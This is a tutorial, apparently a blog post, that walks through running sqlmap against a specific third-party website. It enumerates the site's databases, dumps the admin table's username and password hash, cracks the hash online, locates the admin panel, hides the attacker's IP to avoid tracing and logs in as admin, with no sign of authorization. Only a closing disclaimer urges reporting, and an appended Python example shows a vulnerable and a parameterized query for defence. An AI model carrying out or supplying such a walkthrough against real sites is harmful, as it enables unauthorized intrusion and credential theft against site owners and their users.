Intro – sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
1. Discover Databases
In this step sqlmap is used to find out what databases exist on the target.
Syntax - sqlmap -u <target url> --dbs
Ex - sqlmap -u www.muandme.net/product.php?id=9 --dbs
In this image you can see that after running this command we got some useful information, like 'GET parameter id might be injectable (possible DBMS: MySQL)'. This shows there is a way into this website. As security researchers we can say there is a vulnerability, so a bad guy could use it to cause harm. Let's go to the next step: simply write 'y' and hit enter.
2. Write 'n' and hit enter. If everything is well you will see the next step; simply write 'y' and hit enter. I am not going to tell you why we write 'y' in one place and 'n' in another. Just read what they are asking, decide what you want to do and answer accordingly.
3. Write 'y' and hit enter.
4. Here we got the available databases on our target. Now we have two databases, 'information_schema' and 'muandme'. If you wish, write these down in notepad or somewhere for future work.
5. Find tables in the database
Now it's time to find out what tables exist in a particular database. Let's say the database of interest here is 'muandme', but you should experiment with both. You will get lots of information about your target. For now we will go with only muandme.
Syntax - sqlmap -u <target url> -D <target database> --tables
Ex - sqlmap -u www.muandme.net/product.php?id=9 -D muandme --tables
6. Finding tables in progress...
7. Here we got 19 tables in our target database. Now you have to use your sharp mind and figure out which table to choose so you get the ID or password. Here we are choosing 'admin' because it seems to hold something devilish.
8. Get columns of a table
We have the list of tables with us, and now we get the columns of the admin table.
Syntax - sqlmap -u <target url> -D <target database> -T <target table> --columns
Ex - sqlmap -u www.muandme.net/product.php?id=9 -D muandme -T admin --columns
9. Finding columns in progress...
10. We got 3 columns in our target table 'admin'.
11. Get data of the table
Now comes the most interesting part: extracting the data from the table. First of all we run the command for the username.
Syntax - sqlmap -u <target url> -D <target database> -T <target table> -C <target column> --dump
Ex - sqlmap -u www.muandme.net/product.php?id=9 -D muandme -T admin -C username --dump
12. Here we got the username, and it is 'admin'.
13. Again we are going to dump the password column to find what is in it, so use the same command we used for the column 'username'.
Syntax - sqlmap -u <target url> -D <target database> -T <target table> -C <target column> --dump
Ex - sqlmap -u www.muandme.net/product.php?id=9 -D muandme -T admin -C password --dump
14. While dumping the column we got a hash as the password. Note down this hash for later.
15. As you know we got a hashed password, so in this step sqlmap gives you the option to crack this hash with a dictionary-based attack. As we all know a dictionary attack takes a very long time, but just to show you how it works I am writing 'y' and hitting enter for the next step. Now it shows 3 options for us. Simply go with the default dictionary, so write '1' and hit enter. Again write 'y' and hit enter. In the green font you can see it trying to crack the hash.
16. After some time I realized this was really a bad idea, cracking this hash with a dictionary, so I just stopped it by pressing Ctrl + C. As a result it shows 'no clear password found' and also shows the uncracked hash.
17. Let's break this hash with some external help. So open www.md5decrypter.co.uk in your browser, write the hash in the MD5 Hashes field (see image), fill in the captcha and click on Decrypt Hashes.
18. After some time we cracked this hash and, as you can see, we have the original password now.
19. Now let's find out the admin page of our target URL by using Kali Linux, or there are many websites which can find it easily for you. Follow the image for more.
20. We are finding the target's admin page by using a website, and here we got it. The green one is our admin page.
21. If you take a look at your work chart you will see that now we have everything we need to log in as an admin. Let's make a list of what we have right now in our hands.
(i) Our target’s Admin Page
(ii) Admin username
(iii) Admin Password
Now we just need to log in. But we are forgetting one thing, which is our IP address. Yes, we need to hide our IP so the other party cannot trace us. Use a program for hiding your IP and test your sqlmap skill. As you can see in this image we have successfully logged in and feel like a devil, but don't do anything like a devil. Be an angel and report to the owner that their security is weak, that's it. Don't show off your talent, respect your talent.
Note – I am not responsible for any illegal activity. Don't harm any website. If you find any vulnerability, just report it to their IT department; believe me, you will feel happy to help them.
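To show what sqlmap's 'GET parameter id might be injectable' verdict means on the application side, here is an added example (not from the original post or the sqlmap project) of the injectable lookup behind a product.php?id= page beside its hardened form, written in Python with an in-memory SQLite table standing in for the site's database. The product table schema and rows are constructed; the real site's schema is not on the page.

```python
import sqlite3


def make_db():
    """Constructed sample data: a small product table like the one product.php reads."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?)",
                     [(8, "lamp"), (9, "chair"), (10, "table")])
    return conn


def lookup_vulnerable(conn, raw_id):
    """What an injectable product.php does: the id parameter is pasted into the
    SQL text, so whatever the client sends becomes part of the query."""
    sql = "SELECT name FROM product WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn, raw_id):
    """Two layers of defence: reject anything that is not an integer, then bind
    the value as a parameter so the database never parses it as SQL."""
    try:
        product_id = int(raw_id)
    except ValueError:
        return []  # a real handler would answer HTTP 400 here
    sql = "SELECT name FROM product WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (product_id,))]


def responds_to_boolean_probe(lookup, conn, base_id="9"):
    """sqlmap's 'might be injectable' heuristic in miniature: send the same id
    with a true and a false condition appended and compare the responses.
    A handler whose answers differ is letting the condition reach the database."""
    true_case = lookup(conn, base_id + " AND 1=1")
    false_case = lookup(conn, base_id + " AND 1=2")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", responds_to_boolean_probe(lookup_vulnerable, db))
    print("hardened handler injectable:  ", responds_to_boolean_probe(lookup_hardened, db))
```

The hardened handler returns the same (empty) result for both probes, so the differential that drives sqlmap's verdict disappears; parameter binding, not a blocklist of keywords, is what removes the flaw.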